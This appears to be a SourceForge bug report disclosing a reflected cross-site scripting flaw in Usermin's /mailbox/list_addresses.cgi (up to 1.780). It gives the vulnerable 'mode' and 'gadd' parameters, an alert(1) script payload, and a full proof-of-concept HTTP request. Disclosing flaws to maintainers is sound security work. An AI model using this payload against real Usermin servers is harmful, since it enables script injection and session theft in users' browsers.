https://sourceforge.net/p/webadmin/usermin-bugs/478/2019-10-21T00:44:24.029000ZRecent changes to 478: XSS (cross-site scripting) vulnerability in /mailbox/list_addresses.cgi2019-10-21T00:44:24.029000Z2019-10-21T00:44:24.029000ZPeterhttps://sourceforge.net/u/inf0seq/https://sourceforge.net8d12c558ab4824c88bc3059b6ddaba52de01bc24

<div class="markdown_content"><p>Affects Usermin versions up to 1.780.</p> <p>Testing done by setting all user input parameters to: &gt;"'&gt;&lt;script&gt;alert(1)&lt;/script&gt;</p> <p>The following parameters were found vulnerable: <br/> Set parameter 'mode's value to '%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'<br/> Set parameter 'gadd's value to '%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'</p> <p>This alllowed to successfully embed a script in the response, which than executed when the page loaded in the user's browser.</p> <p>Sample Proof-of-Concept:</p> <p>GET /mailbox/list_addresses.cgi?mode=%3E%22%27%3E%3Cscript%3Ealert%28847%29%3C%2Fscript%3E&amp;gadd=%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1<br/> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko<br/> Referer: <a href="https://10.0.0.5:20000/mailbox/list_addresses.cgi" rel="nofollow">https://10.0.0.5:20000/mailbox/list_addresses.cgi</a><br/> Cookie: usid=f610dae7a3720a29d43a7493da7147f8; testing=1; redirect=1<br/> Connection: Keep-Alive<br/> Host: 10.0.0.5:20000<br/> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,<em>/</em>;q=0.8<br/> Accept-Language: en-US</p> <p>Usermin was inatslled on Ubuntu 18.04.</p></div>